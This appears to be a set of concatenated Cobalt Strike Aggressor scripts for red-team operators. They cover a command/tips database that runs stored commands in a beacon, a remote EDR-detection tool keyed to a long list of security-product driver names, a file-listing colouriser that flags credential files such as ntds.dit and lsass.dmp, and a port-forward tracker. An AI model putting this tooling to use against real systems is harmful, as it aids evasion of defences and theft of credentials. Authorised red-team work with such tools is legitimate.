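# add_def) no longer trips over a missing file. readObject() deserializes an
# arbitrary Java object, so defs.bin must be treated as operator-owned state:
# only ever load a copy this script wrote itself, never one obtained from
# elsewhere.
sub reload_defs {
    local('%entry $handle');
    @database = get_database();
    @customs = @();
    if (-exists "defs.bin") {
        $handle = openf("defs.bin");
        @customs = readObject($handle);
        closef($handle);
    }
    if (size(@customs) > 0) {
        foreach %entry (@customs) {
            add(@database, %entry, -1);
        }
    }
    else {
        # readObject may hand back $null or an empty value; keep a real array
        @customs = @();
    }
}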
# Add a custom definition to defs.bin
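# Callback for the "Add entry" dialog: $3 holds the dialog values (cmd, desc
# and a comma-separated tags string). Builds a definition, appends it to
# @customs, rewrites defs.bin and reloads the database so the entry is
# searchable immediately. Tags are trimmed, otherwise "a, b" stored " b",
# which the exact tag comparison in search() never found.
sub add_def {
    local('%entry $handle $tag @tags');
    foreach $tag (split(',', $3["tags"])) {
        add(@tags, [$tag trim], -1);
    }
    %entry["cmd"] = $3["cmd"];
    %entry["desc"] = $3["desc"];
    %entry["tags"] = @tags;
    println("Adding " . %entry);
    add(@customs, %entry, -1);        # add entry to @customs array
    $handle = openf(">defs.bin");     # open defs.bin for writing (truncates)
    writeObject($handle, @customs);   # serialize the whole @customs array
    closef($handle);                  # close handle
    reload_defs();
}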
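# Register the top-level "csfm" beacon console command and its help text
# (the behaviour lives in the csfm alias below).
beacon_command_register("csfm", "The Red Team Operator's Guide to the Galaxy",
    "\nSyntax: csfm [List]\n" .
    "List all the options to use csfm\n" .
    "\nQueries a database for well known commands, or displays great tips or tricks for a Red Team Operator.\n" .
    "Your friendly Red Team Operator Guide to the Galaxy by 001SPARTaN and r3dQu1nn!\n" .
    "\nExample: search computer, tip ntlm\n"
);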
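# csfm [list|smile]: $1 is the beacon id, $2 the sub-command.
# "list" prints the option table, "smile" prints a blank line, no argument
# prints a usage error and anything else is reported as unknown (it used to
# fall through silently). Sub-commands are compared case-insensitively.
alias csfm {
    local('$arg $out $smile');
    $arg = lc($2);
    if ($arg ismatch 'list') {
        $out  = "csfm Command Options\n";
        $out .= " \c0===============\n\n";
        $out .= " Option Description\n";
        $out .= "\c0 ------ -----------\n";
        blog($1, $out);
        blog2($1, "\cBsearch [option] Search the database for common commands, and tips");
        blog2($1, "\cBtip [option] Display Red Team Tips");
        blog2($1, "\cBruncmd [number] Run a command number returned by search");
        blog2($1, "\cBadd [Enter] Dialog menu to add a command to the database");
    }
    else if ($arg ismatch 'smile') {
        $smile = "\n";
        blog($1, $smile);
    }
    else if ($2 is $null) {
        berror($1, "\c4Need to specify additional syntax! Use the 'list' command for help");
        blog($1, "\cBSyntax Example: csfm list");
    }
    else {
        berror($1, "\c4Unknown option '" . $2 . "'. Use the 'list' command for help");
    }
}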
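# search [term]: run search() on $2 and print every hit as
# "<index> - <cmd>\t<desc>" to the beacon console ($1). The index is what
# runcmd expects. All working variables are local so nothing leaks into the
# global scope (the original left $size global).
alias search {
    local('%entry $index $cmd $desc $size');
    # TODO: Allow search to narrow results by specifying multiple tags (space separated)
    # if multiple args, pass array to search
    # if search has multiple args, make sure to match each arg, not just first
    search($2);
    $size = size(@results);
    blog($1, "Found $size results:");
    foreach %entry (@results) {
        $index = %entry["index"];
        $cmd = %entry["cmd"];
        $desc = %entry["desc"];
        blog($1, "$index - $cmd\t$desc");
    }
}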
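# tip [term]: run tip() on $2 and print every hit as "<index> - <tip text>"
# to the beacon console ($1). $size is local (it used to leak globally) and
# the unused $desc is gone.
alias tip {
    local('%entry $index $tip $size');
    tip($2);
    $size = size(@results);
    blog($1, "Found $size results:");
    foreach %entry (@results) {
        $index = %entry["index"];
        $tip = %entry["tips"];
        blog($1, "$index - $tip");
    }
}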
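# runcmd [number]: look up the entry whose "index" equals $2 in the last
# @results and offer its "cmd" in an editable prompt before running it in the
# beacon $1 (via bpowershell when the entry is tagged "powershell", bshell
# otherwise). Stops at the first match; an index with no match now reports an
# error instead of doing nothing.
alias runcmd {
    local('%entry $index $bid $found');
    $index = $2;
    $bid = $1;
    $found = 0;
    foreach %entry (@results) {
        if (%entry["index"] eq $index) {
            $found = 1;
            # $bid is captured into the lambda so the callback keeps the beacon id
            if ("powershell" in %entry["tags"]) {
                prompt_text("Run command:", %entry["cmd"], lambda({ bpowershell($bid, $1 . $+); }, $bid => $bid));
            }
            else {
                prompt_text("Run command:", %entry["cmd"], lambda({ bshell($bid, $1 . $+); }, $bid => $bid));
            }
            break;
        }
    }
    if ($found == 0) {
        berror($bid, "\c4No result with index '$index'. Run 'search' or 'tip' first and pick a number from its output");
    }
}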
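# add: open the "Add entry" dialog (command, description, comma-separated
# tags); its Add button hands the values to add_def(). $dialog is local so
# it does not collide with the same name used elsewhere in this file.
alias add {
    local('$dialog');
    $dialog = dialog("Add entry", %(cmd => "Command here", desc => "Description here", tags => "Tags here (comma separated)"), &add_def);
    drow_text($dialog, "cmd", "Command: ");
    drow_text($dialog, "desc", "Description: ");
    drow_text($dialog, "tags", "Tags: ");
    dbutton_action($dialog, "Add");
    dialog_show($dialog);
}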
# Populate @database (built-ins plus defs.bin customs) as soon as the script loads
reload_defs();
#EDR.cna
#Author: @r3dqu1nn
#Remotely query a system for EDR products
# Kernel driver file names that list() looks for in the drivers directory
# listing; a directory entry is reported when its name appears here (exact
# match through the `in` predicate). The vendor attribution happens in list().
@edr = @("CiscoAMPCEFWDriver.sys", "CiscoAMPHeurDriver.sys", "cbstream.sys", "cbk7.sys", "Parity.sys", "libwamf.sys", "LRAgentMF.sys", "BrCow_x_x_x_x.sys", "brfilter.sys", "BDSandBox.sys", "TRUFOS.SYS", "AVC3.SYS", "Atc.sys", "AVCKF.SYS", "bddevflt.sys", "gzflt.sys", "bdsvm.sys", "hbflt.sys", "cve.sys", "psepfilter.sys", "cposfw.sys", "dsfa.sys", "medlpflt.sys", "epregflt.sys", "TmFileEncDmk.sys", "tmevtmgr.sys", "TmEsFlt.sys", "fileflt.sys", "SakMFile.sys", "SakFile.sys", "AcDriver.sys", "TMUMH.sys", "hfileflt.sys", "TMUMS.sys", "MfeEEFF.sys", "mfprom.sys", "hdlpflt.sys", "swin.sys", "mfehidk.sys", "mfencoas.sys", "epdrv.sys", "carbonblackk.sys", "csacentr.sys", "csaenh.sys", "csareg.sys", "csascr.sys", "csaav.sys", "csaam.sys", "esensor.sys", "fsgk.sys", "fsatp.sys", "fshs.sys", "eaw.sys", "im.sys", "csagent.sys", "rvsavd.sys", "dgdmk.sys", "atrsdfw.sys", "mbamwatchdog.sys", "edevmon.sys", "SentinelMonitor.sys", "edrsensor.sys", "ehdrv.sys", "HexisFSMonitor.sys", "CyOptics.sys", "CarbonBlackK.sys", "CyProtectDrv32.sys", "CyProtectDrv64.sys", "CRExecPrev.sys", "ssfmonm.sys", "CybKernelTracker.sys", "SAVOnAccess.sys", "savonaccess.sys", "sld.sys", "aswSP.sys", "FeKern.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "mfeaskm.sys", "mfencfilter.sys", "WFP_MRT.sys", "groundling32.sys", "SAFE-Agent.sys", "groundling64.sys", "avgtpx86.sys", "avgtpx64.sys", "pgpwdefs.sys", "GEProtection.sys", "diflt.sys", "sysMon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys", "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter.sys", "symevent.sys", "VirtualAgent.sys", "vxfsrep.sys", "VirtFile.sys", "SymAFR.sys", "symefasi.sys", "symefa.sys", "symefa64.sys", "SymHsm.sys", "evmf.sys", "GEFCMP.sys", "VFSEnc.sys", "pgpfs.sys", "fencry.sys", "symrg.sys", "cfrmd.sys", "cmdccav.sys", "cmdguard.sys", "CmdMnEfs.sys", "MyDLPMF.sys", "PSINPROC.SYS", "PSINFILE.SYS", "amfsm.sys", "amm8660.sys", "amm6460.sys");
#edr_query Command Register
# Register edr_query as a beacon console command; the edr_query alias below implements it
beacon_command_register("edr_query", "Queries the remote or local system for all major EDR products installed",
"Syntax: edr_query [hostname] [arch]\n" .
"Checks the local or remote system for installed EDR products. **Note: Use localhost for [hostname] to query the local system**");
#edr_query alias
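# edr_query [hostname] [arch]: list the drivers directory of the given host
# (or "localhost") through the C$ share and hand the listing to list().
# $bid is deliberately left global: list() and EDR() read it from there
# instead of receiving it as an argument. An arch other than x86/x64 used to
# fall through silently; it is now reported. (The spelling of "architecture"
# in the messages is also corrected.)
alias edr_query {
    $bid = $1;
    if ($2 is $null) {
        blog($bid, "\c4Please enter a remote hostname or localhost!");
        show_message("Please enter a remote hostname or localhost!");
    }
    else if ($3 is $null) {
        blog($bid, "\c4Please enter a valid architecture (x86 or x64)!");
        show_message("Please enter a valid architecture (x86 or x64)!");
    }
    else if ($3 ismatch 'x64') {
        blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
        bls($bid, "\\\\". $2 ."\\C\$\\windows\\system32\\drivers", &list);
    }
    else if ($3 ismatch 'x86') {
        blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
        bls($bid, "\\\\". $2 ."\\C\$\\windows\\sysnative\\drivers", &list);
    }
    else {
        blog($bid, "\c4Unknown architecture '" . $3 . "' - use x86 or x64!");
        show_message("Unknown architecture '" . $3 . "' - use x86 or x64!");
    }
}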
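# Open the "EDR Query Menu" dialog for beacon $1. The Execute button passes
# the hostname and Arch fields to EDR(). $bid is set globally on purpose:
# EDR() and list() read it rather than taking it as a parameter. $dialog is
# local so it no longer leaks into the global scope.
sub query {
    local('$dialog');
    $bid = $1;
    $dialog = dialog("EDR Query Menu", %(hostname => "Enter Remote HostName", Arch => ""), &EDR);
    dialog_description($dialog, "EDR Query Menu. Remotely query a system for EDR products. Hostname field (IP or Hostname) is Mandatory! **Note: Use localhost for the local system.**");
    drow_text($dialog, "hostname", "Target HostName:");
    drow_combobox($dialog, "Arch", "Target Architecture:", @("x86", "x64"));
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);
}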
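# Dialog callback for query(): $3 holds the dialog values ("hostname" and
# "Arch"). Rejects the untouched placeholder or an empty hostname, lists the
# matching drivers directory over the C$ share via bls() with list() as the
# callback, and — new — reports an unselected architecture instead of doing
# nothing. $bid is the global set by query().
sub EDR {
    local('$host $arch');
    $host = $3['hostname'];
    $arch = $3['Arch'];
    if (($host ismatch 'Enter Remote HostName') || ($host eq "")) {
        show_message("Please enter a remote hostname or localhost!");
        blog($bid, "\c4Please enter a remote hostname or localhost!");
    }
    else if ($arch ismatch 'x86') {
        blog($bid, "\cBDetermining what EDR products are installed on ". $host . "...");
        bls($bid, "\\\\". $host ."\\C\$\\windows\\sysnative\\drivers", &list);
    }
    else if ($arch ismatch 'x64') {
        blog($bid, "\cBDetermining what EDR products are installed on ". $host . "...");
        bls($bid, "\\\\". $host ."\\C\$\\windows\\system32\\drivers", &list);
    }
    else {
        show_message("Please select a target architecture (x86 or x64)!");
        blog($bid, "\c4Please select a target architecture (x86 or x64)!");
    }
}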
#Parse dem results
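# bls() callback: $3 is the raw directory listing, one tab-separated
# "type\tsize\tmodified\tname" entry per line. Collects the names that appear
# in @edr, prints a count header when there were any, then prints one line
# per recognised vendor. $bid is read from the global set by edr_query/query().
#
# @results and @matches are local here. The listing used to be written into
# the global @results that csfm's search()/tip()/runcmd share, so running
# edr_query with both scripts loaded in one file wiped the last search hits.
sub list {
    local('$entry $type $size $modified $name $out $count @results @matches');
    @results = split("\n", ["$3" trim]);
    @matches = @();
    foreach $entry (@results) {
        ($type, $size, $modified, $name) = split("\t", $entry);
        if ($name in @edr) {
            blog($bid, "\cB$name Found");
            add(@matches, $name, 0);
        }
    }
    $count = size(@matches);
    if ($count == 0) {
        # Nothing matched, so none of the vendor checks below could fire either
        blog($bid, "\c9No EDR products found! Operate at your own risk!");
        return;
    }
    $out .= "\c4$count EDR Products Found!\n";
    $out .= " \c0======================\n";
    $out .= " | Vendor Information | \n";
    $out .= "\c0 ----------------------";
    blog($bid, $out);
    # Vendor attribution: driver file name(s) -> product
    if ('FeKern.sys' in @matches || 'WFP_MRT.sys' in @matches) {
        blog($bid, "FireEye Found!");
    }
    if ('eaw.sys' in @matches) {
        blog($bid, "Raytheon Cyber Solutions Found!");
    }
    if ('rvsavd.sys' in @matches) {
        blog($bid, "CJSC Returnil Software Found!");
    }
    if ('dgdmk.sys' in @matches) {
        blog($bid, "Verdasys Inc. Found!");
    }
    if ('atrsdfw.sys' in @matches) {
        blog($bid, "Altiris (Symantec) Found!");
    }
    if ('mbamwatchdog.sys' in @matches) {
        blog($bid, "Malwarebytes Found!");
    }
    if ('edevmon.sys' in @matches || 'ehdrv.sys' in @matches) {
        blog($bid, "ESET Found!");
    }
    if ('SentinelMonitor.sys' in @matches) {
        blog($bid, "SentinelOne Found!");
    }
    if ('edrsensor.sys' in @matches || 'hbflt.sys' in @matches || 'bdsvm.sys' in @matches || 'gzflt.sys' in @matches || 'bddevflt.sys' in @matches || 'AVCKF.SYS' in @matches || 'Atc.sys' in @matches || 'AVC3.SYS' in @matches || 'TRUFOS.SYS' in @matches || 'BDSandBox.sys' in @matches) {
        blog($bid, "BitDefender Found!");
    }
    if ('HexisFSMonitor.sys' in @matches) {
        blog($bid, "Hexis Cyber Solutions Found!");
    }
    if ('CyOptics.sys' in @matches || 'CyProtectDrv32.sys' in @matches || 'CyProtectDrv64.sys' in @matches) {
        blog($bid, "Cylance Inc. Found!");
    }
    if ('aswSP.sys' in @matches) {
        blog($bid, "Avast Found!");
    }
    if ('mfeaskm.sys' in @matches || 'mfencfilter.sys' in @matches || 'epdrv.sys' in @matches || 'mfencoas.sys' in @matches || 'mfehidk.sys' in @matches || 'swin.sys' in @matches || 'hdlpflt.sys' in @matches || 'mfprom.sys' in @matches || 'MfeEEFF.sys' in @matches) {
        blog($bid, "McAfee Found!");
    }
    if ('groundling32.sys' in @matches || 'groundling64.sys' in @matches) {
        blog($bid, "Dell Secureworks Found!");
    }
    if ('avgtpx86.sys' in @matches || 'avgtpx64.sys' in @matches) {
        blog($bid, "AVG Technologies Found!");
    }
    if ('pgpwdefs.sys' in @matches || 'GEProtection.sys' in @matches || 'diflt.sys' in @matches || 'sysMon.sys' in @matches || 'ssrfsf.sys' in @matches || 'emxdrv2.sys' in @matches || 'reghook.sys' in @matches || 'spbbcdrv.sys' in @matches || 'bhdrvx86.sys' in @matches || 'bhdrvx64.sys' in @matches || 'SISIPSFileFilter.sys' in @matches || 'symevent.sys' in @matches || 'vxfsrep.sys' in @matches || 'VirtFile.sys' in @matches || 'SymAFR.sys' in @matches || 'symefasi.sys' in @matches || 'symefa.sys' in @matches || 'symefa64.sys' in @matches || 'SymHsm.sys' in @matches || 'evmf.sys' in @matches || 'GEFCMP.sys' in @matches || 'VFSEnc.sys' in @matches || 'pgpfs.sys' in @matches || 'fencry.sys' in @matches || 'symrg.sys' in @matches) {
        blog($bid, "Symantec Found!");
    }
    if ('SAFE-Agent.sys' in @matches) {
        blog($bid, "SAFE-Cyberdefense Found!");
    }
    if ('CybKernelTracker.sys' in @matches) {
        blog($bid, "CyberArk Software Found!");
    }
    if ('klifks.sys' in @matches || 'klifaa.sys' in @matches || 'Klifsm.sys' in @matches) {
        blog($bid, "Kaspersky Found!");
    }
    if ('SAVOnAccess.sys' in @matches || 'savonaccess.sys' in @matches || 'sld.sys' in @matches) {
        blog($bid, "Sophos Found!");
    }
    if ('ssfmonm.sys' in @matches) {
        blog($bid, "Webroot Software, Inc. Found!");
    }
    if ('CarbonBlackK.sys' in @matches || 'carbonblackk.sys' in @matches || "Parity.sys" in @matches || "cbk7.sys" in @matches || "cbstream.sys" in @matches) {
        blog($bid, "Carbon Black Found!");
    }
    if ('CRExecPrev.sys' in @matches) {
        blog($bid, "Cybereason Found!");
    }
    if ('im.sys' in @matches || 'CSAgent.sys' in @matches || 'CSBoot.sys' in @matches || 'CSDeviceControl.sys' in @matches || 'cspcm2.sys' in @matches) {
        blog($bid, "CrowdStrike Found!");
    }
    if ('cfrmd.sys' in @matches || 'cmdccav.sys' in @matches || 'cmdguard.sys' in @matches || 'CmdMnEfs.sys' in @matches || 'MyDLPMF.sys' in @matches) {
        blog($bid, "Comodo Security Solutions Found!");
    }
    if ('PSINPROC.SYS' in @matches || 'PSINFILE.SYS' in @matches || 'amfsm.sys' in @matches || 'amm8660.sys' in @matches || 'amm6460.sys' in @matches) {
        blog($bid, "Panda Security Found!");
    }
    if ('fsgk.sys' in @matches || 'fsatp.sys' in @matches || 'fshs.sys' in @matches) {
        blog($bid, "F-Secure Found!");
    }
    if ('esensor.sys' in @matches) {
        blog($bid, "Endgame Found!");
    }
    if ('csacentr.sys' in @matches || 'csaenh.sys' in @matches || 'csareg.sys' in @matches || 'csascr.sys' in @matches || 'csaav.sys' in @matches || 'csaam.sys' in @matches) {
        blog($bid, "Cisco Found!");
    }
    if ('TMUMS.sys' in @matches || 'hfileflt.sys' in @matches || 'TMUMH.sys' in @matches || 'AcDriver.sys' in @matches || 'SakFile.sys' in @matches || 'SakMFile.sys' in @matches || 'fileflt.sys' in @matches || 'TmEsFlt.sys' in @matches || 'tmevtmgr.sys' in @matches || 'TmFileEncDmk.sys' in @matches) {
        blog($bid, "Trend Micro Inc Found!");
    }
    if ('epregflt.sys' in @matches || 'medlpflt.sys' in @matches || 'dsfa.sys' in @matches || 'cposfw.sys' in @matches) {
        blog($bid, "Check Point Software Technologies Found!");
    }
    if ('psepfilter.sys' in @matches || 'cve.sys' in @matches) {
        blog($bid, "Absolute Found!");
    }
    if ('brfilter.sys' in @matches || 'BrCow_x_x_x_x.sys' in @matches) {
        blog($bid, "Bromium Found!");
    }
    if ('LRAgentMF.sys' in @matches) {
        blog($bid, "LogRhythm Found!");
    }
    if ('libwamf.sys' in @matches) {
        blog($bid, "OPSWAT Inc Found!");
    }
}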
# Beacon context-menu entry that opens the EDR Query dialog for the selected beacon(s)
popup beacon_bottom {
    item "EDR Query" {
        query($1);
    }
}
#
# Color Coded Files Listing.
#
# A nice script that colorizes your `ls` output and keeps track of uploaded files
# to let you highlight them.
#
# Be aware of the additional performance hit when listing big directories,
# caused by the listing processing, coloring and sorting this script does.
#
# Based on the original ProcessColor.cna idea by @r3dQu1nn.
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
# @UPLOADED_FILE_NAMES: file names the ls output should highlight as uploaded
#   through Cobalt Strike (consulted by BEACON_OUTPUT_LS below; how it is
#   populated is not visible in this section).
# $TIMES_TO_DISPLAY_COLORS_SCHEME: number of ls outputs that print the
#   colour legend before it is suppressed.
global('@UPLOADED_FILE_NAMES $TIMES_TO_DISPLAY_COLORS_SCHEME');
@UPLOADED_FILE_NAMES = @();
$TIMES_TO_DISPLAY_COLORS_SCHEME = 3;
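# Render a byte count as a short human-readable size.
#   $1      - size in bytes
#   returns - "" for 0, "<n>B" below 1 KB, otherwise one decimal place with
#             a KB/MB/GB/TB suffix.
# The thresholds are built in floating point: the literal product
# 1024 * 1024 * 1024 * 1024 does not fit a 32-bit int and, if Sleep folds int
# literals as Java ints (as it appears to), wraps to 0, so the GB branch never
# fired and every size >= 1 GB came back as $null. Sizes of 1 TB and above,
# which previously also returned $null, now get a "TB" suffix.
sub interpretSize {
    local('$s $size $kb $mb $gb $tb');
    $s = $1;
    $kb = 1024.0;
    $mb = $kb * 1024;
    $gb = $mb * 1024;
    $tb = $gb * 1024;
    if ($s == 0) {
        $size = "";
    }
    else if ($s < $kb) {
        $size = $s . "B";
    }
    else if ($s < $mb) {
        $size = round($s / $kb, 1) . "KB";
    }
    else if ($s < $gb) {
        $size = round($s / $mb, 1) . "MB";
    }
    else if ($s < $tb) {
        $size = round($s / $gb, 1) . "GB";
    }
    else {
        $size = round($s / $tb, 1) . "TB";
    }
    return $size;
}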
# Formats the output of a Beacon file listing: prints the colour legend (a
# limited number of times), the location line, then one row per entry
# coloured by its kind, and finally an entry count with the total size.
#   $2 - the listing text this block reads: the first line is the location,
#        every further line is tab separated "type, size, last modified,
#        name" (see the split() calls below).
# Returns the formatted listing as one string.
set BEACON_OUTPUT_LS {
    local('$totalsize @subl $outls $temp $size $s $ext $dotpos $type $lastmod $name @lines @ls');
    # $once survives between invocations of this block, so the legend is only
    # printed the first $TIMES_TO_DISPLAY_COLORS_SCHEME times
    # ($TIMES_TO_DISPLAY_COLORS_SCHEME is defined elsewhere in the file).
    this('$once');
    @lines = split("\n", ["$2" trim]);
    # Extension classes that decide the colour of a row. None of these arrays
    # is declared local(), so they are (re)assigned in script scope each call.
    @configuration = @('config', 'conf', 'json', 'yml', 'xml', 'inf', 'properties', 'settings');
    @sensitive = @('ost', 'dmp', 'sqlite', 'sqlite3', 'kdbx', 'kdb', 'dit', 'kirbi', 'ccache', 'kirbis', 'git');
    @sensitive_files = @('ntds.dit', 'lsass.dmp');
    @archives = @('rar', 'zip', '7z', 'tar', 'gz', 'bz2', 'iso');
    @exes = @('msi', 'sys', 'exe', 'dll', 'bat', 'sct');
    @docs = @('csv', 'odt', 'dotx', 'dotm', 'docm', 'xlam', 'xll', 'xlm', 'xlsm', 'xltx', 'msg', 'rtf', 'txt', 'pdf', 'docx', 'doc', 'xls', 'xlsx', 'ppt', 'pptx', 'pptm', 'odp', 'ppsm', 'ppa', 'ppam');
    @sources = @('cpp', 'md', 'h', 'hpp', 'c', 'pl', 'sql', 'php', 'py', 'java', 'rb',
    'html', 'js', 'css', 'asp', 'aspx', 'cs', 'vbs', 'vbe', 'jse', 'ps1', 'sln', 'vcxproj', 'csproj', 'gitignore', 'gitmodules', 'gitattributes');
    # Colour legend, shown only for the first few listings.
    if($once < $TIMES_TO_DISPLAY_COLORS_SCHEME) {
        $outls .= "\cC[*]\o Colors scheme:\n";
        $outls .= "\cC[*]\o ---------------------------\n";
        $outls .= "\cC[*]\o Directories: \c8 YELLOW \o\n";
        $outls .= "\cC[*]\o Cobalt Strike Uploaded Files: \cBBLUE\o\n";
        $outls .= "\cC[*]\o Sensitive files: \c4 RED \o\n";
        $outls .= "\cC[*]\o Configuration files: \c3 DARK GREEN \o\n";
        $outls .= "\cC[*]\o Archives: \c7 ORANGE \o\n";
        $outls .= "\cC[*]\o Source codes: \cC DARK BLUE \o\n";
        $outls .= "\cC[*]\o Executables: \cD MAGENTA \o\n";
        $outls .= "\cC[*]\o Documents: \c9 GREEN \o\n";
        $once += 1;
    }
    $outls .= "\c9[+]\o Location: \cC" . @lines[0] . "\o\n\n";
    $outls .= " Size Type Last Modified Name\n";
    $outls .= " ---- ---- ------------------- ----\n";
    # Everything after the location line is an entry.
    @subl = sublist(@lines, 1);
    $totalsize = 0;
    foreach $temp (@subl) {
        ($type, $s, $lastmod, $name) = split("\t", $temp);
        if ($name eq "." || $name eq "..") {
            continue;
        }
        if($type eq "D") { $type = "dir"; }
        else if($type eq "F") { $type = "fil"; }
        $s = int($s);
        $totalsize += $s;
        $size = interpretSize($s);
        # Extension = lower-cased text after the last dot. A name without a
        # dot, or with a leading dot only (position 0 is false), gets no
        # extension and falls through to the uncoloured default below.
        $dotpos = lindexOf($name, '.');
        $ext = "";
        if(($dotpos) ) {
            $ext = lc(substr($name, $dotpos + 1));
        }
        # Each row keeps type and name (used for sorting) plus the pre-coloured
        # line; the first matching class wins.
        if($type eq "dir") {
            # Directories in YELLOW
            push(@ls, %(type => $type, name => $name, entry => "\c8 $[10]size $[7]type\o $[21]lastmod\c8 $name \o"));
        }
        else if($name in @UPLOADED_FILE_NAMES) {
            # Uploaded Files through Cobalt Strike (the ones we still keep track of) in Blue
            push(@ls, %(type => $type, name => $name, entry => "\cB $[10]size $[7]type\o $[21]lastmod\cB $name $+ \o"));
        }
        else if(($ext in @sensitive) || (lc($name) in @sensitive_files)) {
            # Sensitive files in Red
            push(@ls, %(type => $type, name => $name, entry => "\c4 $[10]size $[7]type\o $[21]lastmod\c4 $name \o"));
        }
        else if($ext in @exes) {
            # Executables in Magenta
            push(@ls, %(type => $type, name => $name, entry => "\cD $[10]size $[7]type\o $[21]lastmod\cD $name \o"));
        }
        else if($ext in @interesting) {
            # Configuration files in Dark Green
            # NOTE(review): @interesting is never assigned in this block, so this
            # branch cannot match; @configuration above looks like the intended
            # list (the legend promises dark green for configuration files) --
            # confirm before renaming.
            push(@ls, %(type => $type, name => $name, entry => "\c3 $[10]size $[7]type\o $[21]lastmod\c3 $name \o"));
        }
        else if($ext in @sources) {
            # Source codes in Dark Blue
            push(@ls, %(type => $type, name => $name, entry => "\cC $[10]size $[7]type\o $[21]lastmod\cC $name \o"));
        }
        else if($ext in @archives) {
            # Archives in Orange
            push(@ls, %(type => $type, name => $name, entry => "\c7 $[10]size $[7]type\o $[21]lastmod\c7 $name \o"));
        }
        else if($ext in @docs) {
            # Documents in Green
            push(@ls, %(type => $type, name => $name, entry => "\c9 $[10]size $[7]type\o $[21]lastmod\c9 $name \o"));
        }
        else {
            push(@ls, %(type => $type, name => $name, entry => " $[10]size $[7]type $[21]lastmod $name \o"));
        }
    }
    # Order by the type string ("dir" sorts before "fil"); the return value is
    # unused, so this relies on sort() rearranging @ls in place.
    sort({ return ($1['type'] cmp $2['type']); }, @ls);
    foreach $temp (@ls) {
        $outls .= $temp['entry'] . "\n";
    }
    $totalsize = interpretSize($totalsize);
    $outls .= "\nFiles and dirs count: " . size(@ls) . ", total size of files: $totalsize \n";
    return $outls;
}
# Seeds @UPLOADED_FILE_NAMES from the 'archives' data model: every archived
# "upload X as Y" task contributes the file-name part of Y, so that later
# listings can colour files uploaded through Cobalt Strike.
# Takes no arguments and returns nothing.
sub collectUploadedFiles {
    local('%entry %archives');
    %archives = data_query('archives');
    if(size(%archives) == 0) {
        return;
    }
    foreach %entry (%archives) {
        # Only task-type archive entries carry the upload command text.
        if (%entry['type'] ne "task") {
            continue;
        }
        # Cheap prefix test before the full pattern match.
        if(indexOf(%entry['data'], "upload ") != 0) {
            continue;
        }
        if(%entry['data'] ismatch '^upload ("[^"]+"|[^\s]+) as ("[^"]+"|[^\s]+)$') {
            ($from, $to) = matched();
            push(@UPLOADED_FILE_NAMES, getFileName($to));
        }
    }
}
# When a beacon is tasked with an upload, remember the destination file name
# so BEACON_OUTPUT_LS can colour it as a Cobalt Strike upload.
#   $2 - the tasking text; only the "Tasked beacon to upload X as Y" form is
#        recognised (the destination is the second capture).
on beacon_tasked {
    local('$from $to');
    if($2 ismatch 'Tasked beacon to upload ("[^"]+"|[^\s]+) as (.+)') {
        ($from, $to) = matched();
        push(@UPLOADED_FILE_NAMES, getFileName($to));
    }
}
# Also track uploads typed directly into a Beacon console ("upload" or
# "upload2"), so the name is known before the task is archived.
#   $3 - the command text typed by the operator
# NOTE(review): the destination capture is optional in the pattern, so a bare
# "upload FILE" yields an empty $to and getFileName() is called on "" --
# confirm that is intended.
on beacon_input {
    local('$from $to');
    if ($3 ismatch '^upload2? ("[^"]+"|[^\s]+) ?("[^"]+"|[^\s]+)?$') {
        ($from, $to) = matched();
        push(@UPLOADED_FILE_NAMES, getFileName($to));
    }
    # Disabled: remove the file from tracking when a delete command is typed.
    #else if ($3 ismatch '(?:shell|powershell|run) del (\w+)') {
    # ($from) = matched();
    # $from = getFileName($from);
    # if($from in @UPLOADED_FILE_NAMES) {
    # remove(@UPLOADED_FILE_NAMES, $from);
    # }
    #}
}
# Populate @UPLOADED_FILE_NAMES from the archives once, at script load.
collectUploadedFiles();
#
# Forwarded_Ports.cna
#
# Keeps track of configured remote port forwardings on all Beacons and lets you kill them easily.
#
# Using 'rportfwd' here and there quickly consumes pool of available local ports
# from which to forward traffic outbound and keeping track of them manually becomes tedious
# on long-haul projects. This script aims to fill that gap by collecting these commands
# and presenting them in a nice visualization pane.
#
# CREDIT:
# This script is a reworked version of `leave_no_trace.cna` by Alyssa (ramen0x3f):
# https://github.com/ramen0x3f/AggressorScripts/blob/master/leave_no_trace.cna
#
# who in turn used work made by @001SPARTaN and @r3dqu1nn that came up with `logvis.cna`
# implementation:
# https://github.com/invokethreatguy/AggressorCollection/blob/master/harleyQu1nn/logvis.cna
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
import ui.*;
import table.*;
import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;
global('$forwarded_ports_model $forwarded_ports_table %forwarded_ports_looking');
# Builds the "Forwarded Ports" visualization: a GenericTableModel-backed
# ATable with per-column sorting, wrapped in a JScrollPane and registered
# with Cobalt Strike under the name "Forwarded Ports".
# Returns the JScrollPane so the caller can place it in a tab.
sub create_vis {
    ## This is the fancy code from @001SPARTaN and @r3dqu1nn
    local('$sorter $content $column');
    $forwarded_ports_model = [new GenericTableModel: @(
        "timestamp", "beacon_id", "beacon_pid", "beacon_ip",
        "beacon_user", "local_port", "remote_host", "remote_port"
    ), "beacon", 16];
    # The table is a view over the model above.
    $forwarded_ports_table = [new ATable: $forwarded_ports_model];
    # Column-header sorting; toggling column 7 (remote_port) twice gives a
    # descending initial sort instead of ascending.
    $sorter = [new TableRowSorter: $forwarded_ports_model];
    [$sorter toggleSortOrder: 7];
    [$sorter toggleSortOrder: 7];
    # timestamp, beacon_id, beacon_ip and beacon_user compare as strings ...
    foreach $column (@(0, 1, 3, 4)) {
        [$sorter setComparator: $column, { return $1 cmp $2; }];
    }
    # ... beacon_pid, local_port, remote_host and remote_port numerically.
    foreach $column (@(2, 5, 6, 7)) {
        [$sorter setComparator: $column, { return $1 <=> $2; }];
    }
    [$forwarded_ports_table setRowSorter: $sorter];
    # Scrollable container for the table.
    $content = [new JScrollPane: $forwarded_ports_table];
    # Right-click menu, then an initial fill of the model.
    setup_popupFT($forwarded_ports_table, "forwarded_ports_menu");
    update_tableFT();
    addVisualization("Forwarded Ports", $content);
    return $content;
}
